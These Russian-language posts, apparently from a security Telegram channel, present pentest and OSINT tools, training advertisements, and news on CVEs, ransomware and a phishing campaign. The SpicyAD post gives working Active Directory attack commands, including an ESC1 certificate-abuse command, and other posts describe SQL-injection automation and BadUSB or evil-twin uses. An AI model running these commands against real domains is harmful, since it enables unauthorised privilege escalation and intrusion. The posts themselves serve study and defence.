wtfis

wtfis — это инструмент командной строки, который собирает информацию о домене, полном доменном имени (FQDN) или IP-адресе, используя различные OSINT-сервисы. В отличие от других подобных инструментов, он создан специально для использования человеком, предоставляя результаты, которые выглядят довольно (результаты могут отличаться) и легко читаются и понимаются.

📕Характиристика:
1️⃣Собирает информацию с VirusTotal
2️⃣Собирает IP-адреса из IPWhois
3️⃣Собирает информацию из Shodan

💻Установка:

pip install wtfis --break-system-packages

cd / 
echo "VT_API_KEY=<ВАШ КЛЮЧ>" >> .env.wtfis

Для использование утилиты необходимо предоставить свой API ключ от VirusTotal

📌Запуск:
➖Базовый:

wtfis <ДОМЕН>

➖Запуск со всеми ключами:

wtfis -A <ДОМЕН>

➖С использованием Shodan:

wtfis -s <ДОМЕН>

➖С использованием URLhaus:

wtfis -u <ДОМЕН>

#tools #wapt #pentest

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Argus

Argus — это универсальный инструментарий на базе Python, разработанный для оптимизации процесса сбора информации и разведки. Он сочетает в себе понятный интерфейс и широкий спектр надежных модулей, позволяя аналитикам эффективно и точно оценивать сети, веб-приложения и среды безопасности.

📕Характиристика:
1️⃣Модули для: Сети и инфраструктур, Анализ веб-приложений, Безопасность и разведка угроз (DNS-анализ, сканирование портов, трассировка, SSL/TLS-анализ, WHOIS, обнаружение технологий, поиск каталогов, анализ уязвимостей, файлов robots.txt)
2️⃣Интерактивный командный интерфейс (CLI)
3️⃣Централизация - Множество задач в одном инструменте с единым интерфейсом, что экономит время и упрощает работу.
4️⃣Расширяемость и настройка - Поддержка внешних API, гибкие настройки и модульная архитектура позволяют адаптировать инструмент.

💻Установка:

git clone https://github.com/jasonxtn/argus.git

cd argus

sudo chmod +x install.sh && sudo ./install.sh

📌Запуск:

argus

#tools #wapt #pentest

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

DevSecOps на практике - старт курса 2 февраля

⚙️ Знаете, в чём главная фишка DevSecOps?
Безопасность перестаёт быть «тормозом» для разработки. Вместо бесконечных проверок «после релиза» — всё встроено в пайплайн. Код проходит SAST, контейнер — сканируется, инфраструктура — проверяется на compliance. В итоге релизы выходят быстрее, а не медленнее.

Именно об этом наш новый курс:
🟡9 модулей, 48 занятий, 90% практики;
🟡инструменты: Docker, Kubernetes, Terraform, Vault, Ansible, Prometheus;
🟡финальный экзамен в стиле OSCP — только реальные задачи;
🟡опыт авторов: внедрение Zero Trust, построение SOC, DevSec-инструменты для Burp Suite.

❓ Узнать подробнее о курсе
🗓 Старт курса 2 февраля

По данным Gartner, за последние 3 года запрос на специалистов DevSecOps вырос в разы. Компании осознали: «сначала сделать, потом чинить» — слишком дорого. Поэтому инженеры, которые умеют внедрять безопасность в CI/CD, сегодня — одна из самых востребованных профессий в ИБ и DevOps.

⬇️ Начать обучение
🥇 По всем вопросам @CodebyManagerBot

Читать полностью…

⬇️ В PyPI снова вредоносные пакеты!

🔁 Вредоносный пакет PyPI имитирует SymPy и развертывает майнер XMRig на хостах Linux.

🔗 В PyPI обнаружен новый вредоносный пакет, имитирующий популярную библиотеку для символьных вычислений, с целью развертывания вредоносных программ, включая майнер криптовалюты, на узлах под управлением Linux.

👉 Пакет под названием sympy-dev имитирует SymPy, дословно воспроизводя описание проекта последнего, чтобы обмануть ничего не подозревающих пользователей, заставив их думать, что они загружают «версию для разработчиков» библиотеки. С 17 января 2026 года его скачали более 1100 раз.

☁️ Оригинальная библиотека была модифицирована для использования в качестве загрузчика для майнера криптовалюты XMRig на скомпрометированных системах. Вредоносное поведение разработано таким образом, чтобы срабатывать только при вызове определенных полиномиальных процедур, что позволяет оставаться незамеченным.

⏺️Конечная цель атаки — загрузка двух исполняемых файлов ELF для Linux, предназначенных для майнинга криптовалюты с использованием XMRig на хостах Linux.

❗️ Будьте внимательны!

#pypi #xmrig #sympy #linux

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Коллеги, уже сегодня встречаемся на Практикуме по Web Application Penetration Testing (WAPT) 🔥

Мы будем разбирать реальный кейс по веб-пентесту. Не в теории, а в реальной работе, когда автоматические сканеры уже не помогают.

🟧 Регистрация: https://wapt-workshop.codeby.school

Что вас ждёт:
🟧 Реальная работа с уязвимостями.
🟧 Презентация курса Академии Codeby.
🟧 Нестандартные XSS и SQL-инъекции, которые не ловят сканеры.
🟧 Разбор уязвимостей и применение эксплойтов.
🟧 Демонстрация методики мышления настоящего пентестера.

Почему важно быть онлайн:
— можно задать вопросы по ходу разбора
— будут детали, которые не попадут в запись
— живой диалог по кейсу, а не монолог.

Практикум пройдёт в прямом эфире.
Количество мест ограничено.
🟧 СЕГОДНЯ, 19:00 МСК
🟧 Регистрируйтесь и получите ссылку на эфир: https://wapt-workshop.codeby.school

Если будут вопросы по регистрации — пишите в бот @CodebyAcademyBot

Читать полностью…

MASTER OSINT

Master OSINT — это комплексный, удобный для начинающих набор инструментов на Python, предназначенный для проведения расследований на основе открытых источников информации. Инструмент поддерживает множество методов расследования.

📕Характиристика:
➖Извлечение GPS-координат из EXIF-данных изображений.
➖Исследование присутствия в социальных сетях на более чем 30 платформах по имени пользователя.
➖Выявление утечек электронной почты и анализ общедоступных фрагментов текста.
➖Проверка подлинности электронной почты с помощью Hunter.io, ReverseContact.com и Epieos.
➖Извлечение метаданных из изображений/документов.
➖Использование расширенных операторов поиска Google (Google Dorking).
➖Доступ к архивным снимкам веб-сайтов через Wayback Machine.
➖Определение IP-адреса и получение отчетов о нарушениях с помощью AbuseIPDB.
➖Парсинг метаданных веб-сайтов и извлечение именованных сущностей с помощью spaCy NLP.
➖Проверка и исследование телефонных номеров с информацией о операторе связи и типе телефона.
➖Выполнение обратного поиска изображений с использованием популярных поисковых систем.
➖Доступ к мощной геопространственной аналитике с помощью Google Satellite и OpenStreetMap.

💻Установка:

git clone https://gist.github.com/5fb49b007d48cf2717bc3c12958e47b5.git

mv 5fb49b007d48cf2717bc3c12958e47b5/ osintmaster/

cd osintmaster/

pip install waybackpy --break-system-packages

📌Запуск:

python3 Master_osint.py

#tools #osint

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Коллеги, в понедельник встречаемся на Практикуме по Web Application Penetration Testing (WAPT) 🔥

Для тех, кто ещё не в списке участников — это хороший повод задуматься.

Мы будем разбирать реальный кейс по веб-пентесту. Не в теории, а в реальной работе, когда автоматические сканеры уже не помогают.

К эфиру подготовлен живой практический разбор.
🟧 Регистрация: https://wapt-workshop.codeby.school

Что вас ждёт:
🟧 Реальная работа с уязвимостями.
🟧 Презентация курса Академии Codeby.
🟧 Нестандартные XSS и SQL-инъекции, которые не ловят сканеры.
🟧 Разбор уязвимостей и применение эксплойтов.
🟧 Демонстрация методики мышления настоящего пентестера.

Это не лекция. Это сложный разбор с моментами, где даже у опытного специалиста возникают вопросы.

Почему важно быть онлайн:
— можно задать вопросы по ходу разбора
— будут детали, которые не попадут в запись
— живой диалог по кейсу, а не монолог.

Практикум пройдёт в прямом эфире.
Количество мест ограничено.
🟧 26 января, 19:00 МСК
🟧 Регистрация: https://wapt-workshop.codeby.school

Если будут вопросы по регистрации — пишите в бот @CodebyAcademyBot

Читать полностью…

🔎 AI позволяет красть данные!

🪧 Уязвимости в фреймворке Chainlit AI позволяют осуществлять кражу данных посредством чтения файлов и уязвимости SSRF.

🔁 В популярной платформе искусственного интеллекта с открытым исходным кодом Chainlit были обнаружены уязвимости безопасности , которые могут позволить злоумышленникам красть конфиденциальные данные, что, в свою очередь, может обеспечить горизонтальное перемещение внутри уязвимой организации.

🎇 Компания Zafran Security заявила, что эти серьезные уязвимости, получившие общее название ChainLeak , могут быть использованы для утечки ключей API облачных сред и кражи конфиденциальных файлов, а также для проведения атак с подделкой запросов на стороне сервера (SSRF) против серверов, на которых размещены приложения искусственного интеллекта.

⏺️ Подробности об этих двух уязвимостях следующие:

➡️ CVE-2026-22218 (CVSS: 7.1) — уязвимость произвольного чтения файлов в процессе обновления "/project/element", позволяющая авторизованному злоумышленнику получить доступ к содержимому любого файла, доступного для чтения службой, в свою собственную сессию из-за отсутствия проверки полей контроллера пользователя.

➡️ CVE-2026-22219 (CVSS: 8.3) — уязвимость SSRF в потоке обновления "/project/element" при настройке с использованием бэкэнда уровня данных SQLAlchemy, которая позволяет злоумышленнику выполнять произвольные HTTP-запросы к внутренним сетевым службам или конечным точкам облачных метаданных с сервера Chainlit и сохранять полученные ответы.

❗️ Будьте внимательны!

#ai #ssrf #cve #chainleak

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

❗️ Уязвимость в Python библиотеке для ИИ

🪧 В библиотеках Python с открытым исходным кодом для искусственного интеллекта, выпущенных Apple (FlexTok), NVIDIA (NeMo) и Salesforce (Uni2TS), обнаружены уязвимости, позволяющие удаленное выполнение кода (RCE) при загрузке файла модели со вредоносными данными.

🧾 «Уязвимости возникают из-за того, что библиотеки используют метаданные для настройки сложных моделей и конвейеров, где используемая сторонняя библиотека создает экземпляры классов, используя эти метаданные. Уязвимые версии этих библиотек просто выполняют предоставленные данные как код. Это позволяет злоумышленнику внедрить произвольный код в метаданные модели, который будет автоматически выполняться при загрузке этих модифицированных моделей уязвимыми библиотеками», — заявило подразделение 42 Palo Alto Networks

💻 Речь идет о сторонней библиотеке Hydra от Meta, а именно о функции «hydra.utils.instantiate()», которая позволяет запускать код с использованием функций Python, таких как os.system(), builtins.eval() и builtins.exec().

🔎 Уязвимости, отслеживаемые как CVE-2025-23304 (NVIDIA) и CVE-2026-22584 (Salesforce), были устранены соответствующими компаниями

❓ А вы используете эти библиотеки в работе?

#python #ai #cve #hydra

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Ваша ИТ-безопасность — это вы. И сегодня это самое уязвимое место.

Атаки стали точечными. Цель — не ваш компьютер, а конкретно вы: ваши данные для шантажа, доступ для мошенничества, ресурсы для скрытого майнинга.

В статье — разбор реальных векторов атаки и как их предотвратить:
⏺️Фишинг, который невозможно отличить от письма коллеги.
⏺️Уязвимости в привычном ПО, которые вы забыли обновить.
⏺️Социнженерия, где ваша вежливость становится оружием против вас.

👉Мы подготовили чек-лист по настройке базовой защиты, рекомендации по выбору EDR-решений для дома и стратегию резервного копирования, которая переживет любую ransomware-атаку.

Узнайте ➡️ в статье, как обезопасить свой компьютер и данные раз и навсегда.

#Ransomware #РезервноеКопирование #ЗащитаДанных #CodebyNet

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Сборная России поедет в Австралию защищать чемпионский титул по кибербезопасности

Российские старшеклассники примут участие в Международной олимпиаде по кибербезопасности, которая пройдет с 27 июня по 2 июля в Сиднее. Подготовкой команды, как и в прошлом году, займутся эксперты Центрального университета и «Лаборатории Касперского».

Напомним, что в 2025 году их усилия принесли блестящий результат: на первой такой олимпиаде в Сингапуре российская сборная завоевала абсолютный комплект наград — 8 медалей из 8 возможных.

Сейчас идет формирование новой команды. К отбору приглашают школьников от 14 лет, увлеченных информационной безопасностью. Регистрация продлится до 7 февраля, после чего кандидатов ждут онлайн-испытания и очные туры.

У сборной России будет шанс повторить прошлогодний триумф на мировой арене.

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

GEOLOCATOR_ULTIMATE

Это инструмент геолокации, написанный на Python, который использует множество источников информации и сопоставляет данные из различных источников.
это продвинутый инструмент геолокации, который объединяет более 20 различных источников для определения физического местоположения IP-адреса или домена. Этот инструмент предназначен для специалистов по безопасности, исследователей, придерживающихся этических норм, и сетевых команд.

📕Характиристика:
1️⃣Автономная база данных (MaxMind GeoLite2)
2️⃣Расширенный анализ консенсуса
3️⃣Выявление угроз и репутации
4️⃣Генерация отчетов в формате JSON
5️⃣Интуитивно понятный интерфейс терминала

💻Установка:

git clone https://github.com/hackermexico/geolocator_ultimate.git

cd geolocator_ultimate/

📌Запуск:
➖Запуск с доменом или IP:

python3 geoultimate.py <TAGRGET>

➖Сохранить вывод в JSON:

python3 geoultimate.py <TAGRGET> --save

#tools #osint

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

🚩 Новые задания на платформе HackerLab!

🕵️ Категория Форензика — Следопыт

🎢 Категория Разное — APT

Приятного хакинга!

Читать полностью…

Сегодня ИБ — это не только политики и регламенты, но и автоматизация.
Python помогает решать задачи эффективнее и масштабнее.

Какие библиотеки используете вы? Пишите в комментариях ⬇️

Для тех, кто только начинает свой путь в автоматизации ИБ, отличным стартом станет курс «Основы программирования на Python». Начните обучение 19 января.

#python #автоматизация #libs

➡ Все наши каналы 💬Все наши чаты ⚡ Для связи с менеджером

Читать полностью…

🔍 rnsec — это лёгкий сканер безопасности для React Native и Expo‑приложений, который ищет уязвимости, секреты и ошибки конфигурации до выхода в прод. Утилита работает из коробки одной командой, полностью локально и отлично подходит для встраивания в CI/CD.

⚙️ Основные возможности rnsec

➡️ Анализирует исходники мобильных приложений на React Native и Expo с учётом их типичных паттернов и анти‑паттернов.
➡️ Покрывает Android и iOS, включая платформенные настройки и конфиги (сетевые политики, storage и др.).
➡️ Детектирует небезопасное хранение данных (например, чувствительные данные в AsyncStorage), HTTP‑трафик без шифрования, слабую аутентификацию, рискованные WebView‑настройки и прочие misconfig‑ошибки.
➡️ Использует разбор AST (Abstract Syntax Tree) вместо простого поиска по строкам, что уменьшает шум и ложные срабатывания.
➡️ Генерирует HTML‑дашборд с удобной навигацией по находкам и JSON‑отчёты для автоматической обработки.


⬇️ Установка и запуск
rnsec распространяется через npm как глобальная CLI‑утилита.

npm install -g rnsec

🗓️ Базовый запуск
Перейди в каталог React Native или Expo‑проекта и запусти сканирование.

cd /path/to/your-react-native-app
rnsec scan

Эта команда:
- находит релевантные файлы проекта;
- прогоняет 68+ правил безопасности;
- формирует HTML‑ и JSON‑отчёты, а также краткую сводку в консоли.

🔧 Примеры использования
- Скан текущего проекта с отчётами по умолчанию:

rnsec scan

- Скан конкретного пути:

rnsec scan --path /Users/dev/my-react-native-app

- Кастомные имена отчётов (HTML + JSON):

rnsec scan --html security-report.html --output security.json

#react #scan #cicd #tool

➡ Все наши каналы 💬Все наши чаты ⚡ Для связи с менеджером

Читать полностью…

🎇 Raspberry Pi Zero

⏺️ Raspberry Pi Zero — это ультракомпактная и бюджетная одноплатная компьютерная система от фонда Raspberry Pi Foundation, предназначенная для обучения, прототипирования и IoT-проектов. Впервые на свет появилась в 2015 году.

🌐 Для пентестеров и сетевых инженеров Raspberry Pi Zero идеальна для создания портативных инструментов: WiFi Pineapple-подобных девайсов с Kali Linux, роутеров с OpenWRT, сканеров сетей (airodump-ng) или honeypot'ов. В связке с USB-гигабитными адаптерами и скриптами на Python/Bash она компактна для полевых тестов VLAN/OSPF уязвимостей или мониторинга.

💻 Основные характеристики:

Модель использует процессор Broadcom BCM2835 (одноядерный ARM11 1 ГГц) с 512 МБ RAM, что обеспечивает базовую производительность для легких ОС вроде Raspberry Pi OS Lite. Поддерживает microSD для хранения, mini-HDMI (до 1080p), два micro-USB (OTG и питание 5В/1–2.5А), 40-pin GPIO (не распаян), CSI для камеры и композитный видео-выход.

🧾 Основные сценарии применения:
📉 Evil Twin AP и Wi-Fi атаки: С Wi-Fi-адаптерами (Zero W/2W) запускают hostapd для rogue-доступных точек, airbase-ng для деаутентификации и захвата handshake'ов WPA/WPA2, имитируя легитимные сети.
📉 BadUSB и HID-эмуляция: Через USB OTG эмулирует клавиатуру/мышь (с P4wnP1 или Dugong), вводя payloads для проброса reverse shell или спуфинга учеток; подключается как сетевой интерфейс для ARP-спуфинга.
​🖱 Мониторинг и инъекции: В режиме man-in-the-middle (с двумя USB-Ethernet) анализирует трафик (tcpdump/Wireshark), проксирует 802.1x-аутентификацию или инжектирует пакеты в VLAN/OSPF-сети.

Варианты моделей:

➡️ Zero: Базовая без Wi-Fi.
➡️ Zero W: Добавлены Wi-Fi 802.11 b/g/n и Bluetooth 4.1/BLE.
➡️ Zero 2 W: Улучшенный чип RP2040 (4-ядерный Cortex-A53 1 ГГц), в 5 раз быстрее оригинала, но тот же объем RAM.
➡️ Zero WH: С предустановленными GPIO-пинами для удобства

❓ Использовали ли вы Raspberry Pi Zero в реальной жизни?

#raspberry #pentest #network #wifi

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

💵 Появилось новое семейство вирусов-вымогателей

🔁 Появился новый штамм вируса-вымогателя Osiris, использующий драйвер POORTRY в атаке BYOVD.

💻 Как сообщили представители команд Symantec и Carbon Black Threat Hunter Team, в атаке использовался вредоносный драйвер POORTRY в рамках известной методики, называемой «использование собственного уязвимого драйвера» (BYOVD), для отключения программного обеспечения безопасности.

🎇 Стоит отметить, что Osiris считается совершенно новым штаммом программы-вымогателя, не имеющим ничего общего с другим вариантом с тем же названием , появившимся в декабре 2016 года как разновидность программы-вымогателя Locky. В настоящее время неизвестно, кто является разработчиками этой программы-вымогателя, и рекламируется ли она как услуга-вымогатель (RaaS).

🔗 Однако специалисты заявили, что обнаружили признаки, указывающие на то, что злоумышленники, развернувшие программу-вымогатель, могли ранее быть связаны с программой-вымогателем INC (также известной как Warble).

⏺️ «Утечка данных злоумышленниками в хранилища Wasabi, а также использование версии Mimikatz, ранее применявшейся злоумышленниками с тем же именем файла (kaz.exe) при развертывании программы-вымогателя INC, указывают на потенциальную связь между этой атакой и некоторыми атаками, связанными с INC».

☁️ POORTRY несколько отличается от традиционных атак BYOVD тем, что использует специально разработанный драйвер, предназначенный для повышения привилегий и завершения работы средств безопасности, в отличие от развертывания легитимного, но уязвимого драйвера в целевой сети.

👉 Для защиты от целенаправленных атак организациям рекомендуется отслеживать использование инструментов двойного назначения, ограничивать доступ к службам RDP, внедрять многофакторную аутентификацию (2FA), использовать список разрешенных приложений там, где это применимо, и осуществлять хранение резервных копий вне офиса.

❗️ Будьте внимательны!

#ransomware #osiris #poortry

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Maltrail — это open source система обнаружения вредоносного сетевого трафика, которая отслеживает подозрительные подключения и события на основе публичных и собственных списков индикаторов компрометации

❓ Что такое Maltrail
Maltrail — лёгкая система детекции вредоносного трафика, построенная на Python и ориентированная на анализ сетевых соединений на уровне сенсора. Она сопоставляет трафик с (black)-листами, включающими домены, IP‑адреса, URL и даже HTTP User‑Agent, а также использует эвристики для выявления новых угроз.

🧾 Основные сценарии:
📉 Мониторинг периметра и DMZ через SPAN/mirror‑порт или TAP.
📉 Лёгкий IDS‑слой для малых сетей и лабораторий.
🖱 Honeypot‑наблюдение и сбор телеметрии для исследовательских задач.

⬇️ Установка и базовый запуск
Maltrail разворачивается на Linux‑системе и может работать как на одном хосте, так и в роли отдельного сенсора и сервера.

🔔 Быстрый старт
➡️ Установить зависимости

sudo apt-get install git python3 python3-dev python3-pip python-is-python3 libpcap-dev build-essential procps schedtool
sudo pip3 install pcapy-ng

➡️Клонировать репозиторий Maltrail:

git clone --depth 1 https://github.com/stamparm/maltrail.git
cd maltrail

➡️ Запустить сенсор:

sudo python sensor.py

🔔 Запуск с помощью docker

docker run -d --name maltrail --restart=unless-stopped -p 8338:8338/tcp -p 8337:8337/udp -v /etc/maltrail.conf:/opt/maltrail/maltrail.conf:ro ghcr.io/stamparm/maltrail:latest
docker stop maltrail
docker pull ghcr.io/stamparm/maltrail:latest
docker start maltrail

Далее в maltrail.conf настраиваются параметры сенсора (интерфейс, период обновления trails и т.п.) и сервера (адрес/порт, SSL для защиты доступа к веб‑интерфейсу).

#ids #honeypot #detection #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

🌶 SpicyAD

Инструмент для тестирования на проникновение в среде Active Directory, написанный на языке C# и предназначенный для проведения оценки безопасности. Он объединяет несколько методов атак на AD в простом в использовании в инструменте с интерактивным интерфейсом командной строки.

SpicyAD автоматически определяет и использует LDAPS (порт 636), если он доступен, и LDAP (порт 389), если нет.

🟧Возможности
Содержит в себе 5 различных категорий атак:
🟧Перечисление - получение информации о домене, пользователях, компьютерах, отношениях в домене, делегаций, LAPS, шаблонов сертификатов;
🟧Атаки Kerberos - Kerberoasting (RC4/AES), AS-REP Roasting, Password Spray, Pass-the-Ticket, Targeted Kerberoasting;
🟧Атаки на ADCS - ESC1, ESC4, PKINIT + UnPAC-the-hash;
🟧Атаки на получение учетных данных - Shadow Credentials, RBCD;
🟧Управление AD - добавление/удаление пользователей, узлов, изменение паролей и т.д.

Флаги, используемые для подключения к домену:
🟧/domain:<fqdn> - FQDN целевого домена;
🟧/dc-ip:<ip> - IP-адрес контроллера домена;
🟧/user:<user> - логин для аутентификации в домене;
🟧/password:<pwd> - пароль для аутентификации в домене;
🟧/dns:<ip> (опциональный параметр) - IP-адрес DNS-сервера.

Примеры использования🟧
Сбор данных через bloodhound.

.\SpicyAD.exe bloodhound /collection:all
#or
.\SpicyAD.exe /domain:evilcorp.net /dc-ip:10.10.10.10 /user:admin /password:P@ssw0rd bloodhound /collection:all

Поиск уязвимостей в шаблонах сертификатов (ESC1-4, ESC8).

.\SpicyAD.exe /domain:evilcorp.net /dc-ip:10.10.10.10 /user:admin /password:P@ssw0rd enum-vulns

Проведение ESC1-атаки.

.\SpicyAD.exe /domain:evilcorp.net /dc-ip:10.10.10.10 /user:lowpriv /password:P@ssw0rd esc1 /template:VulnTemplate /target:administrator /sid

Добавление новой машины в домен.

.\SpicyAD.exe /domain:evilcorp.net /dc-ip:10.10.10.10 /user:admin /password:P@ssw0rd add-machine /name:YOURPC$ /mac-pass:P@ssw0rd123

#AD #tools #pentest #ESC

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

🚗 На HackerLab появилась новая категория задач — Pro-лаборатории

Что это такое?
Pro-лаба — это сеть машин с уязвимостями.
Задача — найти слабые места, разобраться, как всё устроено, использовать уязвимости и шаг за шагом углубляться в сеть, собирая флаги на каждом этапе.

Чем отличается от обычных задач?
Это не “одна машина — один флаг — конец”. Тут нетривиальные сценарии, цепочки, побочные ветки и моменты, где надо:
➡️ ориентироваться в сети, а не в одном хосте
➡️ разбирать нестандартные протоколы
➡️ находить подсказки в самых неожиданных местах
➡️ комбинировать техники, потому что одной не хватит

Часть флагов — обязательные для продвижения цепочки, а часть — побочные: они открывают дополнительные возможности и дают то самое чувство «а, вот оно как устроено».

И это доступно по подписке Pro вместе с сотнями CTF-задач и курсами:
⏺️Введение в информационную безопасность
⏺️SQL Injection Master

Залетай и проверь, насколько хорошо ты умеешь двигаться по сети

🔗 https://hackerlab.pro/

Читать полностью…

❗️ Россию накрывает новая волна фишинговой кампании!

🇷🇺 Многоэтапная фишинговая кампания нацелена на Россию с использованием RAT-программы Amnesia и Ransomware.

✉️ «Атака начинается с методов социальной инженерии, используемых в качестве приманки с помощью документов деловой тематики, которые выглядят обычными и безобидными», — заявила исследовательница Кара Лин. «Эти документы и сопровождающие их скрипты служат визуальными отвлекающими маневрами, перенаправляя жертв на фальшивые задачи или сообщения о состоянии, в то время как вредоносная деятельность незаметно происходит в фоновом режиме».

🔔 В рамках этой кампании используются методы социальной инженерии для распространения сжатых архивов, содержащих множество поддельных документов и вредоносный ярлык Windows (LNK) с русскоязычными именами файлов. Файл LNK использует двойное расширение. Один из примеров: "Задание_для_бухгалтера_02отдела.txt.lnk".

🔔 При выполнении скрипт запускает команду PowerShell для получения следующего этапа — сценария PowerShell, размещенного в репозитории GitHub ("github[.]com/Mafin111/MafinREP111"), который затем служит загрузчиком первого этапа для закрепления системы, подготовки системы к сокрытию следов вредоносной активности и передачи управления последующим этапам.

🔔 После того как документ отображается жертве для поддержания обмана, скрипт отправляет сообщение злоумышленнику через API Telegram-бота , информируя оператора об успешном выполнении первого этапа. После преднамеренно введенной задержки в 444 секунды скрипт PowerShell запускает скрипт Visual Basic ("SCRRC4ryuk.vbe"), размещенный в том же репозитории.

🪧 Скрипт Visual Basic сильно обфусцирован и выступает в роли контроллера, который собирает полезную нагрузку следующего этапа непосредственно в памяти, тем самым избегая оставления каких-либо следов на диске. Скрипт на заключительном этапе проверяет, выполняется ли он с повышенными привилегиями, и, если нет, многократно отображает запрос контроля учетных записей пользователей ( UAC ), чтобы заставить жертву предоставить ему необходимые разрешения. Скрипт делает паузу в 3000 миллисекунд между попытками.

🧾 Одна из последних полезных нагрузок, развертываемых после успешного отключения средств защиты и механизмов восстановления, — это Amnesia RAT ("svchost.scr"), которая загружается из Dropbox и способна к масштабной краже данных и удаленному управлению. Она предназначена для кражи информации, хранящейся в веб-браузерах, криптовалютных кошельках, Discord, Steam и Telegram, а также системных метаданных, скриншотов, изображений с веб-камеры, звука с микрофона, содержимого буфера обмена и заголовка активного окна.

☁️ Для противодействия злоупотреблениям со стороны defendnot в отношении API Центра безопасности Windows, Microsoft рекомендует пользователям включить защиту от несанкционированного доступа, чтобы предотвратить несанкционированные изменения настроек Defender, а также отслеживать подозрительные вызовы API или изменения в работе служб Defender.

❗️ Будьте внимательны и предупредите своих коллег! ❗️

#russia #phishing #rat #microsoft

Источник: https://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

SQLMutant

SQLMutant — это инструмент для тестирования SQL-инъекций, включающий как пассивные, так и активные процессы разведки для любого заданного домена. Он фильтрует URL-адреса, чтобы выявить те, параметры которых подвержены SQL-инъекциям, а затем выполняет атаки с использованием инъекций. Эти атаки включают сопоставление шаблонов, анализ ошибок и атаки по времени.

📕Характиристика:
1️⃣URL Fuzzer - Эта функция позволяет пользователю указать целевой URL-адрес, а затем выполнить фаззинговую атаку для обнаружения любых уязвимых параметров, которые могут быть использованы для SQL-инъекций.
2️⃣SQL Payloads - SQLMutant предоставляет набор предопределенных полезных нагрузок для SQL-инъекций, которые можно использовать для проверки наличия уязвимостей.
3️⃣Header Fuzzer - Эта функция позволяет пользователю фаззингировать HTTP-заголовки для проверки на наличие уязвимостей SQL-инъекций.
4️⃣Waybackurls Integration - В SQLMutant интегрирован инструмент Waybackurls, используемый для поиска исторических версий веб-страницы. Эта функция позволяет находить страницы, которые больше недоступны, но могут содержать уязвимости, существовавшие в прошлом.
5️⃣Arjun Integration - SQLMutant также интегрирует инструмент Arjun, который используется для поиска скрытых параметров и каталогов на веб-сервере.

💻Установка:

pip3 install uro --break-system-packages

sudo apt install golang-go

export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin

Лучше добавить эти команды в ~/.bashrc

go install github.com/tomnomnom/waybackurls@latest

sudo apt-get install arjun

go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest

sudo apt-get install jq toilet lolcat

git clone https://github.com/blackhatethicalhacking/SQLMutant.git

cd SQLMutant/

chmod +x SQLMutant.sh

📌Запуск:

./SQLMutant.sh

#tools #web #SQL

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

Go-Hash

Инструмент идентификации алгоритмов для хешей, таких как MD5, SHA1, SHA256, SHA512, MYSQL.

📕Характеристика:
1️⃣Очень простой интерфейс.
2️⃣Поддержка основных алгоритмов (MD5, SHA1, SHA256, SHA512, MYSQL)


💻Установка:

git clone https://github.com/HunxByts/Go-Hash.git

cd Go-Hash

pip3 install -r requirements.txt --break-system-packages

📌Запуск:

python3 gohash.py

#tools #hash #cryptography

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Читать полностью…

⚡️ ZDNS — высокоскоростной DNS-резолвер и утилита командной строки для выполнения крупномасштабных измерений DNS. Написан на языке Go и содержит собственный код рекурсивного разрешения и кэш, оптимизированный для поиска разнообразных наборов имен.

💻 Установка

git clone https://github.com/zmap/zdns.git
cd zdns
make install

Состоит из следующих типов модулей:
🔴Модули Raw DNS предоставляют необработанный DNS-ответ от сервера, аналогичный dig, но в формате JSON. Существует модуль практически для каждого типа DNS-записи.

A, AAAA, AFSDB, ANY, ATMA, AVC, AXFR, BINDVERSION, CAA, CDNSKEY, CDS, CERT, CNAME, CSYNC, DHCID, DMARC, DNSKEY, DS, EID, EUI48, EUI64, GID, GPOS, HINFO, HIP, HTTPS, ISDN, KEY, KX, L32, L64, LOC, LP, MB, MD, MF, MG, MR, MX, NAPTR, NID, NINFO, NS, NSAPPTR, NSEC, NSEC3, NSEC3PARAM, NSLOOKUP, NULL, NXT, OPENPGPKEY, PTR, PX, RP, RRSIG, RT, SVCBS, MIMEA, SOA, SPF, SRV, SSHFP, TALINK, TKEY, TLSA, TXT, UID, UINFO, UNSPEC, URI.

🔴Модули Lookup предоставляют более полезные ответы, когда требуется несколько запросов (например, выполнение дополнительного A поиска для IP-адресов, если получен NS в NSLOOKUP).
🔴Модули Misc предоставляют другие дополнительные средства запроса серверов (например, bind.version).

🔺Использование
Инструмент состоит из библиотеки рекурсивного резолвера и оболочки CLI.

1️⃣Raw DNS - echo "censys.io" | zdns A
В выводе для данной команды будет содержаться следующая информация:

{
"name": "censys.io",
"results": {
"A": {
"data": {
"additionals": [
{
"flags": "",
"type": "EDNS0",
"udpsize": 512,
"version": 0
}
],
"answers": [
{
"answer": "104.18.10.85",
"class": "IN",
"name": "censys.io",
"ttl": 300,
"type": "A"
},
{
"answer": "104.18.11.85",
"class": "IN",
"name": "censys.io",
"ttl": 300,
"type": "A"
}
],
"protocol": "udp",
"resolver": "[2603:6013:9d00:3302::1]:53"
},
"duration": 0.285295416,
"status": "NOERROR",
"timestamp": "2024-08-23T13:12:43-04:00"
}
}
}

